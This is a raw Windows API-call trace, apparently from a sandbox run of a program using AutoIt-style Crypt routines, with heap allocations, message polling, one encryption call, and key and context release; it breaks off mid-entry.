[0194.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0194.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0194.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0194.772] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0194.772] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0194.772] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.773] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0194.773] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.773] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0194.773] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0194.773] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.773] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0194.773] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0194.773] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0194.773] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.773] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.773] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.773] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0194.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0194.774] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x22da, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x22e0) returned 1 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0194.774] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0194.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0194.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0194.775] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.775] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0194.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.775] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0194.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0194.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0194.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.776] CharLowerBuffW (in: lpsz="byte[8929]", cchLength=0xa | out: lpsz="byte[8929]") returned 0xa [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0194.776] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0194.776] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.776] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0194.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0194.777] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbec300*, pdwDataLen=0x87e820*=0x22da, dwBufLen=0x22e0 | out: pbData=0xbec300*, pdwDataLen=0x87e820*=0x22e0) returned 1 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0194.777] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0194.777] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.777] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0194.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0194.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0194.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0194.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0194.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0194.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0194.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0194.778] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0194.778] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.778] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0194.778] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.778] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.778] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.778] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.778] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0194.778] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.778] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.778] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.778] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.778] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.780] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.780] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.780] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0194.780] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0194.780] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.780] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0194.780] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.780] CryptDestroyKey (hKey=0x90af98) returned 1 [0194.780] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0194.780] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0194.780] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0194.780] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0194.780] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0194.780] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0194.780] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0194.780] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0194.780] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.780] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0194.781] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0194.781] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0194.781] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0194.781] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0194.781] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.781] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0194.781] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.781] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0194.781] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.781] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.781] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.781] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.781] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0194.781] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.781] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0194.781] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0194.781] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0194.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.781] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0194.781] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, 